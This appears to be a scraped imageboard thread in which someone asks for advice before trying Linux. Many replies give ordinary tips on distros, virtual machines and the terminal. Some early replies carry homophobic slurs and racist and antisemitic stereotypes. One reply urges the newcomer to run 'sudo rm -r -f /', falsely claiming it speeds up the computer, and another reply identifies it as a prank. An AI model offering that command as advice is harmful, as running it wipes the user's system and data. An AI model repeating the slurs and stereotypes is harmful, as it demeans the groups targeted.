So Sup Forums I'm interested in trying out linux because I'm bored. Is there anything I should know beforehand

So Sup Forums I'm interested in trying out linux because I'm bored. Is there anything I should know beforehand

That you're a faggot.

the jews run hollywood

blacks like to steal things

everyone should know this

here you go, op. good stuff to know, right here.

Begin your journey young one. But know this, at some point you will be tempted to load compiz. This is the path to neckbeard, choose wisely.

You should know that OP is always a faggot, fucken faggot.

as soon as you enter the shell type "sudo rm -r -f /" it makes your PC faster

fuck off. the world needs more linux users
dont type in random shit OP. this is the linux equivalent of the delete system32 meme

what distro are you trying?

Don't dual boot, just go all in. You will be forced to learn and you will learn fast.

Learn basic Linux commands. It'll put you ahead of the curve in basic computing. Fuck GUIs, do every you can inside the terminal; and you'll become better at as you use it consistently. GNU/Linux has a lot of powerful commands you can wield with ease. The trick is to keep fresh in your mind.

you should install virtualbox or some other VM and try it before you install

Terminals are allot faster than using GUI. Unless your a slow typer. Linux is allot more customizable. For more advanced users you can chain programs together to complete large tasks if you wished. But for the newbies i would stick to ubuntu or elementaryos. Which are both closer to the experience of window. To install programs on ubuntu you can just type. apt-get install [program name] into a terminal. and it will search for and install the program for you. Like for instance. "apt-get install steam" will install steam for you. Sense your not on windows now all the software you use on windows wont probably be available. But their are excellent alternatives. Like instead of Microsoft Office. Use Libre office. In linux any type of file can be executed given the right premissions. So you wont see any .exe files. But usually in a termal executable programs will appear green. Or you may have a .sh or shell script to start a program.

Install gentoo

I did this. Was fun.

That said, distro matters, as does like, interest in the backend.

but I mean really, itd be nice if non-poweruer types used gnulinux too, because spreading freesoftware to the wider world is probably a good thing.

/me started on arch, just commenting. It worked, arch isnt hard, really probably no distro is hard iff you speand enough time working and learning, but basically any 'mainstream' distro with wide support and userbase is suitable for newcommers.

Linux is shit, and only good for servers.

I main unix7 :p

Run it in a VM inside your Windows

what sort of wm/de?

avoid anything that uses systemd, it's backdoored

arch linux is your best bet
>inb4 debifags

Don't.

- - use - -
\o/ crux \o/

uses no systemd
demands use of terminal
compiz is not even in our repos
being a crux user does not exlude one from knowing about nifty tricks for real life
crux =! debian therefore crux = good

Learn the command lines bitch, download a pdf
I'm on linux now

I'm on crux now.

funny you should say that I actually put that on a USB tonite to boot up n install in the morning >> it looks promising

oh really? cool

Sometimes I feel like the lone crux evangelist in a niche of weirdo linux evangelists in a vast ocean of people who don't care.

Have fun and good luck. It can be a bit confusing and messy, but I like it.

thanks mate --
the ports packman is what drew me in to be honest, seems like a refreshing change

Avoid super mutants, raiders, and keep an eye on that geiger counter.

Do you hate video games or something?

>no games

erm, whatabout
>0ad
>nethack
>df
>rogue
>cataclysmdda
>wesnoth
>minetest

all those others.

I'm not even a gamer

Install Gentoo!

>Minecraft
>Steam

Also OpenMW and Borderlands

Ironically if he sticks with it for a couple of months i'm sure he will do it for shits and giggles like we all have at some time